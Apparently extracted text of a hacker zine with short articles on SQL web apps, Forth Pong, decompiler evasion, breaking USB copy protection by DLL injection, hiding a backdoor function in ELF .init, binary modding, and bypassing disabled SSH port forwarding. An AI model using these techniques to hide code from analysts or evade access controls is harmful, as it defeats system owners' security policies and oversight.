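Base64 adds about a third to the file size and the percent-encoding adds a little more, so the file that actually fits is noticeably smaller than the raw QR capacity.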

Guy Dupont
Portfolio: https://www.guycombinator.net
44 Project Source: https://github.com/dupontgu/qr-file-share SAA-POOL 0.0.7
WebDev... in SQL ? Programming

WebDev… in SQL ?
$ sqlite3
sqlite> select introduction from article;

# A rebel's approach to web applications


Building a web application today generally means bringing in a backend framework, then a
frontend framework, and having thousands of dependencies before you even have a Hello World.

The tool I'd like to present here is a single executable file that lets you build full-stack applications
with nothing but… **SQL queries** !

sqlite> select answer from faq where question = 'That sounds like a terrible idea';

# Why it works
Yes, making a web page entirely in SQL sounds like heresy. But *SQLPage* makes it work by
providing **ready-to-use components** that take data in from your SQL queries, and produce nicely
styled HTML. It also exposes URL parameters and form fields as SQL prepared statement parameters.

For some applications, the traditional separation of frontend, backend, and database brings more
overhead than benefits. By collapsing these layers into just SQL, SQLPage makes building web apps
accessible to people who don't have the time to learn the Javascript framework *du jour* every day.

Write a .sql file, connect your Postgres, MySQL, SQL Server, or SQLite db, and you have a website.

sqlite> select * from examples;

| code                               | result                                     |
+------------------------------------+--------------------------------------------+
| select 'list' as component;        |                                            |
| select                             |                                            |
|     word as title,                 |                                            |
|     'plus' as icon                 |                                            |
| from greetings;                    |                                            |
|                                    |                                            |
+------------------------------------+--------------------------------------------+
| select 'form' as component;        |                                            |
| select 'Pet' as name;              |                                            |
|                                    |                                            |
| insert into pets (name)            |                                            |
| select :Pet                        |                                            |
| where :Pet is not null;            |                                            |
|                                    |                                            |
| select 'table' as component;       |                                            |
| select * from pets;                |                                            |
|                                    |                                            |
+------------------------------------+--------------------------------------------+

sqlite> select * from links;


| sql.datapage.app | github.com/sqlpage | youtube.com/@SQLPage | learnsqlpage.com |

Ophir Lojkine
https://x.com/ophir_dev
Public Domain https://ophir.dev 45
Retro Games retro and love if Forth code then

GAMES RETRO AND LOVE IF FORTH CODE THEN


If languages like FORTRAN and Algol-60 are dinosaurs1
that have left a huge imprint in the current computer land-
scape, then Forth deserves the respect of the venerable stro-
matolites. Coding in Forth is like watching life emerge from
the primordial soup.
Inspired by Thomas Petricek’s excellent The Lost Ways of
Programming 2 , the following is a Pong game coded in Durex-
forth 3 on the Commodore 64 through the Vice4 emulator.
Things to notice: a colon starts a word (function) definition
and a semicolon ends it; an @ means fetch and ! means write; player 1’s controls are w for up and s for down
(keys 87 and 83, respectively), and player 2’s are the up and down arrows (keys 145 and 17); RUN/STOP
(Esc, key 3) terminates the game. Finally, there are no abstract, pre-defined objects like points or lines, it all
comes together straight from the C64 memory map into something that looks like English at the end.

1 variable x variable y \ ball pos 46 then loop ;


2 variable dx variable dy \ ball dir 47 : game−over ( −− )
3 variable p1 variable p2 \ paddle pos 48 clear 10 times−down 15 times−right
4 variable s1 variable s2 \ scores 49 ." game over" cr 10 times−down
5 variable cmd \ game commands 50 to−lower quit ;
6 : update−command ( −− ) 51 : serve ( −− ) 20 x ! 12 y ! ;
7 key? invert 52 : p1−scores ( −− ) s1 @ 1+ s1 ! serve ;
8 if 0 cmd ! exit else key cmd ! then ; 53 : p2−scores ( −− ) s2 @ 1+ s2 ! serve ;
9 : pos! ( y x −− ) $030e c! $030d c! 54 : update−scores ( −− )
10 0 $030c c! 65520 sys ; 55 0 10 pos! s1 @ . 0 30 pos! s2 @ . ;
11 : clear 147 emit ; : quit−game? @ 3 = ; 56 : check−winner s1 @ 2 > s2 @ 2 > or
12 : to−upper 21 $d018 c! ; 57 if game−over then ;
13 : to−lower 23 $d018 c! ; 58 : p1−missed? ( −− )
14 : ms 0 do 10 0 do loop loop ; 59 x @ 0 = y @ p1 @ < and
15 : times−down 0 do 17 emit loop ; 60 x @ 0 = y @ p1 @ 4 + > and or
16 : times−right 0 do 29 emit loop ; 61 if p2−scores check−winner then ;
17 : blank 32 emit ; : ball 209 emit ; 62 : p2−missed? ( −− )
18 : l−pad 182 emit ; : r−pad 181 emit ; 63 x @ 38 = y @ p2 @ < and
19 : draw−pad−1 ( −− ) 64 x @ 38 = y @ p2 @ 4 + > and or
20 p1 @ 0 > 65 if p1−scores check−winner then ;
21 if p1 @ 1− 0 pos! blank then 66 : bounce ( −− )
22 5 0 do p1 @ i + 0 pos! l−pad loop 67 y @ x @ pos! blank update−x update−y
23 p1 @ 20 < 68 p1−missed? p2−missed? update−scores
24 if p1 @ 5 + 0 pos! blank then ; 69 draw−net x @ bounce−x y @ bounce−y
25 : draw−pad−2 ( −− ) 70 y @ x @ pos! ball 30 ms ;
26 p2 @ 0 > 71 : move−p1 ( k −− )
27 if p2 @ 1− 38 pos! blank then 72 dup 87 = if p1 @ 1− p1 ! drop else
28 5 0 do p2 @ i + 38 pos! r−pad loop 73 83 = if p1 @ 1+ p1 !
29 p2 @ 20 < 74 then then ;
30 if p2 @ 5 + 38 pos! blank then ; 75 : move−p2 ( k −− )
31 : reset−console ( −− ) 76 dup 145 = if p2 @ 1− p2 ! drop else
32 0 x ! 0 y ! 1 dx ! 1 dy ! 77 17 = if p2 @ 1+ p2 !
33 10 p1 ! 10 p2 ! 0 s1 ! 0 s2 ! ; 78 then then ;
34 : update−x ( −− ) x @ dx @ + x ! ; 79 : update−p1 ( a −− )
35 : update−y ( −− ) y @ dy @ + y ! ; 80 @ move−p1 p1 @ 0 max 20 min p1 ! ;
36 : bounce−x ( x −− ) 81 : update−p2 ( a −− )
37 dup 38 = if −1 dx ! 37 x ! drop 82 @ move−p2 p2 @ 0 max 20 min p2 ! ;
38 else 1 < if 1 dx ! 2 x ! 83 : pong
39 then then ; 84 clear reset−console to−upper
40 : bounce−y ( y −− ) 85 begin bounce draw−pad−1 draw−pad−2
41 dup 25 = if −1 dy ! 23 y ! drop 86 update−command
42 else 0 < if 1 dy ! 2 y ! 87 cmd update−p1 cmd update−p2
43 then then ; 88 cmd quit−game? until
44 : draw−net ( −− ) 89 clear to−lower ; pong
45 24 0 do i 2 mod if i 20 pos! l−pad
1 Figures from https://vectorportal.com
2 https://tomasp.net/commodore64
3 https://github.com/jkotlinski/durexforth
4 https://vice-emu.sourceforge.io, all URLs accessed on August 04, 2024.

Rodolfo García Flores &


Lauren S. Ferro
SAA-TIP 0.0.7
https://github.com/Karmaz95/Snake_Apple

The RE, VR, & ExpDev Newsletter

Your invite is here ....Join the club


Reverse Engineering About stack variables recognition and how to thwart it

About stack variables recognition and how to thwart it


Seekbytes

1 Introduction to local variable inference

The secret art of reverse engineering is an imprecise one, built on tools that rely on very advanced techniques to reconstruct high-level code from a given executable file. Given any instruction set architecture (well-known examples: Intel, ARM, or JVM), the real challenge is to recover the set of high-level elements that compilation has removed or transformed. Examples of what the compiler removes include variable names, control flow constructs, strings, and in general all the high-level details not needed at the low level.

In this article, I would like to talk about how most decompilers infer the allocation of local variables within a function. As soon as the disassembly phase, which transforms bytes into understandable instructions, is completed, the decompiler begins its work by applying a series of fixed-point analyses, such as dataflow analysis (constant propagation, liveness). Then the time comes when it must try to reconstruct the local variables of the function, that is, figure out which of the variables used by the low-level code are allocated on the stack and destroyed as soon as the subprocedure returns. The stack is in fact used for three main purposes: to pass arguments from the caller to the callee, to allocate temporary variables that are valid only within the scope of the function, and to store the return address that is retrieved when a return statement is encountered within the function.

2 The semi-naive algorithm

The most common decompilers – including Binary Ninja, IDA, and Ghidra – may use a very naive version of the variable retrieval algorithm that works on offsets relative to the base pointer register, also called the BP-frame heuristic. It is much easier to show an example than to explain it: within the disassembly, we have several mentions of the stack base pointer. Instructions of the type mov [ebp-0x14], eax are converted to a simple MEM[ebp-0x14] = eax by an operation called lifting. This allows the decompiler to say immediately that the memory at address ebp minus 0x14 receives the contents of the general-purpose register eax. When we find ebp - 0x14 or esp - 0x14, we are most likely referring to a local variable at offset -0x14, named in most cases var_14.

The decompiler recognizes that address in memory and assumes that a new variable has been declared within the "hypothetical" high-level source code. The decompiler runs through all the instructions of the basic blocks that make up a function. The algorithm keeps track of all the accesses to the stack: for each new offset it encounters, it allocates a new variable whose type it does not yet know, but for which it knows that there is a read or write at that address. The stack analysis is then completed by checking where parameters are saved, and by further checks needed to ensure the analysis is sound (such as stack balance and checking for overlapping variables).

3 Consequences of using the semi-naive algorithm

The consequence of using the semi-naive algorithm is that you can freely manipulate offsets from the stack base pointer to trick the decompiler into thinking that there are variables or arguments where in fact there are none. Decompilers build part of their later stages on the assumption that they have a crystal-clear view of the stack and can infer the elements on it, because by default the stack should be no larger than 1MB, which allows a fast analysis.

However, the semi-naive algorithm can easily be exploited by actors whose goal is to break decompilation. The trick is to make the decompiler believe that the function uses a very large area of the stack, when in fact that area is only the result of the decompiler's overapproximation. The overapproximation comes from considering every branch as alive (i.e., assuming the program could jump at runtime even to a branch that is actually dead). In reality, experience says that someone may deliberately create dead branches that will never be executed at run time, so the real execution context never involves those branches.

To successfully inject an impossible index for the stack variables:

1. create a dead execution branch that will never be executed at runtime (e.g., via opaque predicates: conditions that we know a priori are always true or always false).
2. inside the branch that is never executed, access a local variable placed at a very high or very low offset from the stack base pointer.

Note that this also works for offsets that go above the stack base pointer, i.e., the arguments (much also depends on how the stack is constructed, whether it grows upward or downward). In addition to destroying local variable recognition, it is possible to cause the decompiler to make very different assumptions about how arguments are passed at runtime, making it almost impossible to recognize the usual calling conventions.

    // Intel syntax: build with e.g. gcc -masm=intel on x86-64.
    // Each label must be unique in the translation unit, so use each macro once.
    #define huge_sp_predicate_for_local_variables \
        __asm__("push rax \n"                /* mem[sp] = rax      */ \
                "xor eax, eax \n"            /* eax = eax ^ eax    */ \
                "jz live_branch \n"          /* is eax == 0?       */ \
                "and ecx, [rbp - 123456] \n" /* huge value (dead)  */ \
                "live_branch: \n"            /* always true branch */ \
                "pop rax \n")                /* rax = mem[sp]      */

    #define huge_sp_predicate_for_arguments \
        __asm__("push rbx \n"                /* mem[sp] = rbx      */ \
                "xor ebx, ebx \n"            /* ebx = ebx ^ ebx    */ \
                "jz live_branch_2 \n"        /* is ebx == 0?       */ \
                "and ecx, [rbp + 123456] \n" /* huge value (dead)  */ \
                "live_branch_2: \n"          /* always true branch */ \
                "pop rbx \n")                /* rbx = mem[sp]      */

    // where needed
    huge_sp_predicate_for_local_variables;
    huge_sp_predicate_for_arguments;

If you recognize the dead branch, fixing it is very simple for an analyst in IDA: click the portion of the assembly code that you think is dead and use the Undefine option from the right-click menu. Another alternative is to manually edit the stack via the Edit function option, or to change the heuristic for finding the local variables.

Figure 1: The final result

If you are looking for a good way to dumbly destroy the inference of the IDA decompiler, perhaps forcing people to look directly at the assembly code instead of starting with the decompiler, you could use this technique. This transformation has been used a lot in obfuscated binaries such as Apple FairPlay, where the combination of local variables allocated at very large stack offsets and bogus arguments partly destroyed static analysis. As an exercise for the reader, someone might want to find out whether this can also be applied to the SP-based heuristic.
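To make the heuristic and its weakness concrete, here is a minimal Python sketch of a BP-frame scan. It is not how any particular decompiler is implemented; the function names, the regular expression, and the toy instruction lists are assumptions made for illustration. Like the semi-naive algorithm described in this article, it ignores control flow, so an access inside a dead branch counts as much as a live one.

```python
import re

# Matches Intel-syntax memory operands such as [rbp-0x14] or [ebp + 8].
BP_ACCESS = re.compile(r"\[\s*[er]bp\s*([+-])\s*(0x[0-9a-fA-F]+|\d+)\s*\]")


def infer_frame(instructions):
    """Collect every base-pointer offset mentioned anywhere in the function.

    Negative offsets are treated as local variables, positive ones as
    arguments. Control flow is deliberately ignored (hypothetical model
    of the semi-naive heuristic).
    """
    local_vars, arguments = set(), set()
    for ins in instructions:
        for sign, value in BP_ACCESS.findall(ins):
            offset = int(value, 0)  # accepts both hex and decimal literals
            if sign == "-":
                local_vars.add(offset)
            else:
                arguments.add(offset)
    return sorted(local_vars), sorted(arguments)


def frame_size(local_vars):
    """The inferred frame must be large enough for the deepest local."""
    return max(local_vars, default=0)


# Toy function body, then the same body with the dead-branch predicate added.
clean = ["mov [rbp-0x14], eax", "mov ecx, [rbp-0x8]", "mov edx, [rbp+0x10]"]
obfuscated = clean + ["xor eax, eax", "jz live_branch", "and ecx, [rbp - 123456]"]

print(frame_size(infer_frame(clean)[0]))
print(frame_size(infer_frame(obfuscated)[0]))
```

A single unreachable instruction is enough to inflate the inferred frame from a few bytes to over a hundred kilobytes, which is why a control-flow-aware analysis (or the manual fix described above) is needed to recover the real layout.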

Seekbytes
https://nicolo.dev
https://twitter.com/nicolodev
SAA-ALL 0.0.7
Examining USB Copy Protection Reverse Engineering

Examining USB Copy Protection

A while ago, a friend of mine asked me whether it is possible to prevent people from copying the files on a USB thumb drive. Specifically, the files are PDFs and are his intellectual work. He wishes that people could read them, but could not copy them to another location, e.g., the hard drive of a computer.

In other words, he wants a DRM solution. Intuitively, his goal is hard to achieve, since being able to view the files means the PDF reader can access the content of the file, and there is no easy way to prevent it from writing it elsewhere. Encrypting the files is not enough, since the files still have to be decrypted before the PDF reader can process them.

1 How does it work?

I purchased one of the USB copy protection solutions and the product looks like a regular thumb drive (and it is!). I inserted it into my computer and found an application on it. I launched it and it asked me to configure an admin password and a guest password. Then it presented an explorer-like GUI that allows me to add files to it. The idea is that I use the admin password to add files, then ship the drive to the user, who uses the guest password to view the files.

I added a "test.pdf" to the root directory of the drive. Files added to the drive are invisible in Windows Explorer, and can only be accessed using the application that comes with the drive. When the file is double-clicked, a PDF reader is launched and it opens the file. It is not the PDF reader on my computer – the PDF reader comes with the drive. And it is rigged, so that the "Save As" option (among others) is missing from the menu. There is also no way to open the PDF using an external reader that I can control.

I played around for a while and I did not see a trivial way to defeat it. I then checked the command line arguments of the PDF reader, and saw that it reads a file "Z:\test.pdf". I suspect the "Z:\" drive is emulated by the application, and whenever someone tries to access a file on it, the application kicks in and provides the appropriate content. Something like this can be implemented via a minifilter¹ driver, though I do not know if that is the case for this particular product.

2 Let us break it!

The first thing I tried is – can I access the file using its path directly? I tried to copy it in PowerShell, and to open it with a normal PDF reader on my computer. Both failed. I got access denied on it.

So far it holds the line. I reviewed all the info I had and listed a few options to try. I can reverse engineer the application and figure out how it works. This is definitely going to work, but it can be very time-consuming. I can also hook the kernel32!ReadFile API and dump the contents as they are read. But if the PDF reader does not read all of the file at once, my dump would be incomplete.

The core problem is that the PDF reader is reading the file just fine, but I cannot read it using another tool. What could be making the difference? I made some educated guesses and figured it is likely that the application is enforcing some access controls on it. Maybe it checks whether the process that tries to read the file is a subprocess of itself, or it validates the path of the requesting process, etc. There are plenty of ways to do it.

Soon, I had a eureka moment – regardless of the actual access control policy, we know the PDF reader is allowed to read the file. If we inject our code into it, then it is very likely it just works. I quickly wrote some simple code to read the file and write it to a different location.

I compiled it into a DLL and injected it into the PDF reader process with Cheat Engine. And it works – the file is successfully copied to the hard drive!

3 Remarks

Now that we have broken the myth of the USB copy protection – let us think from the other side and see whether the protection can be improved. Though I do not know how it works exactly, let us just assume it uses the above-mentioned access control policy and validates the file access requests. First of all, it can harden the PDF reader to make DLL injection harder, or, when a DLL injection is detected, reject the access.

Going deeper, the core issue is that the file gets decrypted too early. There is a clear boundary between the encrypted and the decrypted file at the process level. In other words, the manager application decrypts the file, and the PDF reader reads the original unencrypted file. This boundary is vulnerable and easily exploited. If the solution could move the decryption logic into the PDF reader, and decrypt the file on the fly right before it gets parsed, then my method would fail (it could only read the encrypted file).

That said, these would not be easy to implement. Not only does it start getting closer to an anti-cheat/DRM solution, it also means doing extensive modifications to the PDF reader, which makes the entire solution significantly more complex.

In the end, I presented my research to my friend and explained that while the copy protection can be circumvented, it is still an option because the attack is beyond an average user. I also suggested a different solution based on watermarking, i.e., adding invisible watermarks to the PDFs (e.g., on the images), where each copy has a different watermark which can be used to identify the leaker in the case of a leak. Still, it would not be perfect – as is always the case with DRM.

¹ https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/about-file-system-filter-drivers
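The reasoning behind the injection trick can be illustrated with a toy model of the guessed access policy. The sketch below is purely hypothetical: the article stresses that the product's real policy is unknown, and the process table, PIDs, and function names here are invented for illustration. It models the "is the requester a subprocess of the manager?" guess and shows why code running inside the bundled reader passes the check.

```python
def is_descendant(pid, ancestor_pid, parent_of):
    """Walk the parent chain of pid; True if ancestor_pid appears in it."""
    seen = set()
    while pid in parent_of and pid not in seen:
        seen.add(pid)  # guard against cycles in a malformed table
        pid = parent_of[pid]
        if pid == ancestor_pid:
            return True
    return False


def may_read(requesting_pid, manager_pid, parent_of):
    """Hypothetical policy: only descendants of the manager app may read."""
    return is_descendant(requesting_pid, manager_pid, parent_of)


# Hypothetical process table (child pid -> parent pid):
#   100 = manager application, 200 = bundled PDF reader started by it,
#   300 = an unrelated PowerShell session.
MANAGER, READER, POWERSHELL = 100, 200, 300
parent_of = {MANAGER: 1, READER: MANAGER, POWERSHELL: 1}

print(may_read(POWERSHELL, MANAGER, parent_of))  # external tool
print(may_read(READER, MANAGER, parent_of))      # reader, or code injected into it
```

A policy keyed on process identity cannot tell the reader's own code apart from a DLL loaded into the same process, since both issue requests under the same PID. That is the gap the remarks above propose to close by detecting injection or by moving decryption into the reader.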

Xusheng Li
https://xusheng.dev/
SAA-ALL 0.0.7
Reverse Engineering Lying with Sections

Lying with ELF Sections

A big thanks to bluec0re without whom this project would not have been possible.

Create the following C code:

    #include <stdio.h>
    __attribute__((section (".s2")))
    int function2(void) {
        puts("Function 2");
    }
    __attribute__((section (".s1")))
    int function1(void) {
        puts("Function 1");
    }
    int main() {
        function1();
    }

And compile it like this:

    gcc -o example1.pre example1.c
    S1=$(objdump -j .s1 -h example1.pre | \
      awk '/.s1/ { print "0x" x $4 }')
    objcopy --change-section-vma .s2=$S1 \
      example1.pre example1

Running this program prints "Function 1". However, if you open this in IDA Pro¹, it will show the following:

    int main() {
        function2();
    }

Clicking the function call still shows the correct function, so this isn't a big deal, but it tells us something about how IDA is operating. Both Binary Ninja² and Ghidra³ get it right.

Abusing .init

The above example suggests that some tools might over-rely on sections to inform them. However, the disassembly and decompilation of the code remains correct. Can we still use this to do something tricky? Apart from things like code and data, ELF binaries have various other sections of interest. The ".init" section contains code that is executed before main by the "__libc_start_main" function. Let's get tricky. Create the following C code:

    #include <stdio.h>
    int main() {
        puts("Hello World!");
        return 0;
    }
    void backdoor() {
        puts("Backdoor!");
    }

And compile it like this:

    # Omit .eh_frame to fool Ghidra
    gcc -fno-asynchronous-unwind-tables \
      -o ex2.pre example2.c
    # Store the original .init to use as decoy
    objcopy --dump-section .init=i1.bin ex2.pre
    # Create backdoor trampoline
    ADDR1=$(nm ex2.pre | grep '\bbackdoor\b' | \
      awk '{print "0x" x $1}')
    ADDR2=$(objdump -j .init -h ex2.pre | \
      awk '/\.init/ { print "0x" x $4 }')
    JUMP=$(printf "%#x" $(($ADDR1-$ADDR2)))
    cat > init_redirect.asm <<EOF
    BITS 64
    call \$+$JUMP
    ret
    EOF
    nasm -fbin -oi2.bin init_redirect.asm
    # Insert the trampoline and decoy
    objcopy --update-section .init=i2.bin \
      --rename-section .init=.xinit \
      --add-section=.init=i1.bin \
      --set-section-flags .init=alloc,code \
      --change-section-vma .init=$ADDR2 \
      ex2.pre example2
    strip -s example2 -o example2.strip

Running example2 outputs "Backdoor!" and "Hello World!". Opening this in IDA Pro shows a normal-looking "_init_proc" function, and even if we manually check the backdoor function, no cross-references to it are found. With some code changes, we might even be able to prevent the IDA sweeper from finding the function at all. This now also fools Ghidra, which shows you a completely normal "_DT_INIT". In fact, Ghidra does not even identify the backdoor function as code at all. Depending on how you interpret it, even objdump output can be misleading here, since it shows disassembly of both the original ".init" and the detour at the same virtual address. Binary Ninja still shows correct output.

Analysis

Why does this work? We just said that the ".init" section is special. If we rename it to something else, then it should no longer be executed. It turns out that this is an outdated description of the situation. Reading the glibc source code reveals this comment:

    Note: The init and fini parameters are no longer used ... For dynamically linked executables, the dynamic segment is used to locate constructors and destructors ...

Indeed, in the segment containing the ".dynamic" section, we find a table where one of the entries is the pair (DT_INIT,0x1000), and this is the virtual address of the init function. This is what the decompilers should use to determine where the init function is, not section names.

¹ IDA version 8.4.240527
² Binary Ninja version 4.2.6016-dev
³ Ghidra version 11.1.2
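As a rough illustration of the lookup the Analysis section argues for, the following Python sketch scans a raw dynamic table for the DT_INIT entry. It assumes a 64-bit ELF whose dynamic segment bytes have already been extracted by the caller (locating PT_DYNAMIC through the program headers is left out), and the function name find_dt_init is made up for this example. The tag values DT_NULL = 0 and DT_INIT = 12 and the 16-byte Elf64_Dyn layout come from the ELF specification.

```python
import struct

DT_NULL = 0   # terminates the dynamic table
DT_INIT = 12  # address of the initialization function


def find_dt_init(dynamic_bytes, little_endian=True):
    """Return the DT_INIT address from raw Elf64_Dyn entries, or None.

    Each Elf64_Dyn entry is a signed 64-bit tag followed by an unsigned
    64-bit value. Section names play no role in this lookup.
    """
    fmt = "<qQ" if little_endian else ">qQ"
    for offset in range(0, len(dynamic_bytes) - 15, 16):
        tag, value = struct.unpack_from(fmt, dynamic_bytes, offset)
        if tag == DT_NULL:
            break
        if tag == DT_INIT:
            return value
    return None


# Synthetic table: DT_NEEDED (tag 1), DT_INIT at 0x1000, then DT_NULL.
table = (struct.pack("<qQ", 1, 0x50)
         + struct.pack("<qQ", DT_INIT, 0x1000)
         + struct.pack("<qQ", DT_NULL, 0))
print(hex(find_dt_init(table)))
```

Because the address comes from the dynamic table rather than from a section called ".init", renaming sections or adding a decoy section as in the example above would not change the result of this lookup.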

Calle "ZetaTwo" Svensson


https://zeta-two.com
Twitter: @ZetaTwo
SAA-TIP 0.0.7
Revitalizing Binaries Reverse Engineering

[Figure: Project Ironfist, a game mod for Heroes of Might and Magic II, created with Revitalize. www.ironfi.st]

Revitalizing Binaries

So you have an old program and you want it to have some new features, but you don't have the source code. What can you do?

This article is a crash course on binary modification, the techniques used by hackers, game modders, and retro software enthusiasts to change software they don't control. I'll explain the main ways people do it. But also I've worked on a rare approach to binary modification that I call Revitalize. I don't think it's that hard, but I've found almost no instances of anyone doing similar. Yet I think it has the best ROI for a lot of use-cases. I explain it here for the first time.

How to modify binaries?

There are three main ways to modify a program without its source. The simplest is binary patching, where you just open the program in a hex editor. For example, changing 0x0F84 to 0x0F85 swaps two if-branches. Done in the right place, it can let you run a program that checks for a physical CD on a laptop without a CD drive. Or if you find the table that says how many hit points each unit has, you can just change it. But you can't make the program bigger, so you can't really add new features – unless you find some unused bytes in the binary (a code cave).

The second is DLL injection: loading code alongside the existing process that tweaks it somehow. Commonly, the new code will hot-patch some function by overwriting it in memory to jump to some new code, placed in freshly allocated memory. This is enough to add major new features, and is done by everything from Cheat Engine to the Magisk and Cydia engines used to "tweak" jailbroken mobile devices.

The third is to decompile and recompile the entire program. But this is really hard. Decompilers today are imperfect, and doing this requires manually changing the entire program to get it to re-compile. Lots of room to add bugs.

Revitalize!

The Revitalize approach offers most of the advantages of full recompilation but for a fraction of the effort. The big idea: keep most of the code the same, but replace just a few definitions with decompiled versions.

The first step is to "unlink" a program by turning it into a disassembly where all function and global variable addresses are replaced by names. IDA can basically do this, except that it uses its own dialect of assembly that needs patching to be reassembled. But the magic comes from making the assembly look like this:

    IFDEF IMPORT_?SomeFunc@@namemangling
    ?SomeFunc@@namemangling PROTO SYSCALL
    ELSE
    ?SomeFunc@@namemangling proc near SYSCALL
    <function definition>
    ENDIF

That's Microsoft Macro Assembler for "if a flag is set, declare SomeFunc as defined elsewhere, else define it here." What does this let you do? Well, in a related file, you write IMPORT_?SomeFunc@@namemangling=1. Then you write a new SomeFunc in C/C++. And suddenly all the old code uses your new SomeFunc instead of the existing one. You can also have it generate a copy of the original SomeFunc, so that your new SomeFunc can just wrap the old behavior.

The first thing this lets you do is modify existing functions in the same way as DLL injection, except that, after generating the specially-formatted disassembly, it's mostly like normal programming in a normal IDE. But the really cool thing is this also works for static data structures. Say your game has an array defining the stats and assets of all the 70 unit types in the game, and you want to add a new unit. If you had the original code, you would just edit the array and add a new entry. Binary patching and DLL injection can't do this. But with Revitalize, one simply types IMPORT_?globalUnitsArray@@namemangling=1, and then you can copy the decompiled array into a C++ file, and modify it as easily as if you had the original code.

And that's basically it! You pretty much just need a copy of IDA and a script to output a disassembly in this special format, which you can find at https://tinyurl.com/binaryrevitalize. There are a few extra steps that won't fit here, but I'll happily coach anyone interested in trying this.
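For readers who have never done the first technique, binary patching, here is a small Python sketch of the 0x0F84 to 0x0F85 swap mentioned above. It is only an illustration: the function name flip_branch, the sample bytes, and the offset are invented, and in practice you would first locate the right conditional jump in a disassembler. On x86, 0F 84 is the near form of JE/JZ and 0F 85 is JNE/JNZ, so swapping them inverts the condition without changing the file size.

```python
JE_NEAR = bytes([0x0F, 0x84])   # je/jz rel32
JNE_NEAR = bytes([0x0F, 0x85])  # jne/jnz rel32


def flip_branch(image: bytes, offset: int) -> bytes:
    """Return a copy of image with the conditional jump at offset inverted.

    Refuses to patch if the two bytes at offset are not one of the
    expected opcodes, which protects against a wrong offset.
    """
    patched = bytearray(image)
    current = bytes(patched[offset:offset + 2])
    if current == JE_NEAR:
        patched[offset:offset + 2] = JNE_NEAR
    elif current == JNE_NEAR:
        patched[offset:offset + 2] = JE_NEAR
    else:
        raise ValueError(f"no je/jne opcode at offset {offset:#x}")
    return bytes(patched)


# Hypothetical code fragment: nop; je +0x10; ret
original = bytes.fromhex("90 0f 84 10 00 00 00 c3")
patched = flip_branch(original, 1)
print(patched.hex(" "))
```

The patched image has exactly the same length as the original, which is the limitation described above: a patch like this can change behavior, but it cannot make room for new code.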

Jimmy Koppel
Project website: www.ironfi.st
Project Github: https://github.com/jkoppel/project-ironfist/
LinkedIn: https://www.linkedin.com/in/james-koppel-ph-d-0527b654/
Blog: pathsensitive.com
X/Twitter: @jimmykoppel
CC BY 4.0
Art School.pt3
aliquid
X/Twitter: @_aaliquid
ArtStation: https://artstation.com/aliquid
SAA-TIP 0.0.7
Circumventing Disabled SSH Port-Forwarding with a Multiplexer Security/Hacking

Circumventing Disabled SSH Port-Forwarding with a Multiplexer

We've all been there. You're preparing to SSH to that obscure production server to debug some issue, ready to port-forward the misbehaving service. Then you are greeted by the following message:

    % ssh server -D 1337
    channel 3: open failed: administratively prohibited: open failed

Basically you understand that the server's sshd is configured to deny port forwards by disabling GatewayPorts and AllowTcpForwarding in sshd_config(5). Say we can't modify sshd_config, can we find another way to tunnel to that service?

SSH Internals Primer

After completing authentication, ssh(1) proceeds with opening 'channels' to the requested SSH subsystems on the remote server. A channel in this context is a bidirectional stream. Under the hood, ssh(1) multiplexes multiple channels over the same, single TCP connection that was established during the authentication phase.

Channels have an associated type, which indicates to the server what destination subsystem should consume the channel traffic. Command execution, X11 forwards, and port forwards all have associated channel types. sshd_config port forwarding enforcement only runs for channels of the port-forward type.

Finding a Workaround

Let's analyze what happens when we execute a single remote command:

    % echo foo | ssh server -- cat
    foo

It appears to be possible for a local program and a remote program to interact with each other via standard streams, piped through SSH. Assuming we are able to upload new programs to the server, we can probably tunnel any type of conversation we want between the two programs. What about tunneling a second multiplexer?

yamuxfwd

Yamux is a simple multiplexing protocol that, like SSH's channel multiplexer, is able to transfer multiple bidirectional streams over a single IO channel. Unlike SSH, yamux can be packaged as a standalone program, which allows using it in versatile situations, say through an SSH command channel...

Introducing yamuxfwd: a simple yamux CLI utility I cobbled together in 20 minutes with ChatGPT. yamuxfwd has two modes of operation:

• Listen mode - execute a child process, establish yamux multiplexing with the child process over stdin/stdout. Listen for TCP connections, open a new yamux channel for each incoming TCP connection and pipe traffic between the channel and the TCP connection.
• Connect mode - to be eventually launched by the listen mode's child process. Establish the other end of yamux over stdin/stdout, wait for new yamux channels, dial a TCP connection to a destination server passed via CLI args, pipe traffic between the channel and its designated outgoing TCP connection.

Here's how to use yamuxfwd to construct a simple port-forward pipeline: run both ends of yamuxfwd (listen/connect) through SSH. As new connections arrive at the local listener, new yamux channels are opened over the same command IO channel:

    % yamuxfwd -l 8080 -- ssh server -- yamuxfwd -c localhost:8080 &

Throwing an HTTP proxy server into the mix (here I used ncat(1)), we are able to construct a command pipeline that eventually exposes the remote ncat proxy server as a port listening on the client's localhost, usable by a local browser (works like ssh -D):

    % ssh server -- ncat -klp 1342 --proxy-type http &
    % yamuxfwd -l 1342 -- ssh server -- yamuxfwd -c localhost:1342 &

And there you have it: a functional HTTP proxy over SSH's command channel, that runs without triggering sshd's port-forwarding enforcement.

Alternatively

For SSH, you could get away with creating the sneaky tunnel without using yamux at all. All you need to do is to reuse the already-existing SSH channel multiplexer. Instead of establishing a yamux conversation over a single command channel, use the SSH control socket feature to create new command channels as needed, cheaply. Here are the commands:

    % ssh -M -S /tmp/ssh-%r@%h:%p -fN server &
    % ssh -S /tmp/ssh-%r@%h:%p server -- ncat -l 127.0.0.1 -p 1342 --proxy-type http &
    % ncat -klp 1342 -c 'ssh -S /tmp/ssh-%r@%h:%p server -- ncat 127.0.0.1 1342' &
    % curl -x http://localhost:1342 https://web-service
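The core idea of carrying several logical streams over one pipe can be sketched in a few lines of Python. This is a toy framing scheme invented for illustration, not the yamux wire format and not the code of yamuxfwd: each frame is assumed to carry a 4-byte stream id and a 2-byte payload length, and the names mux and demux are hypothetical.

```python
import struct

# Toy frame header: stream id (4 bytes) + payload length (2 bytes), big-endian.
HEADER = struct.Struct(">IH")


def mux(frames):
    """Serialize (stream_id, payload) pairs into one byte stream."""
    out = bytearray()
    for stream_id, payload in frames:
        out += HEADER.pack(stream_id, len(payload)) + payload
    return bytes(out)


def demux(data):
    """Split a muxed byte stream back into per-stream payloads."""
    streams = {}
    pos = 0
    while pos < len(data):
        stream_id, length = HEADER.unpack_from(data, pos)
        pos += HEADER.size
        streams.setdefault(stream_id, bytearray()).extend(data[pos:pos + length])
        pos += length
    return {sid: bytes(buf) for sid, buf in streams.items()}


# Two logical connections interleaved over a single pipe (e.g. ssh's stdio).
wire = mux([(1, b"GET /"), (2, b"foo"), (1, b" HTTP/1.1")])
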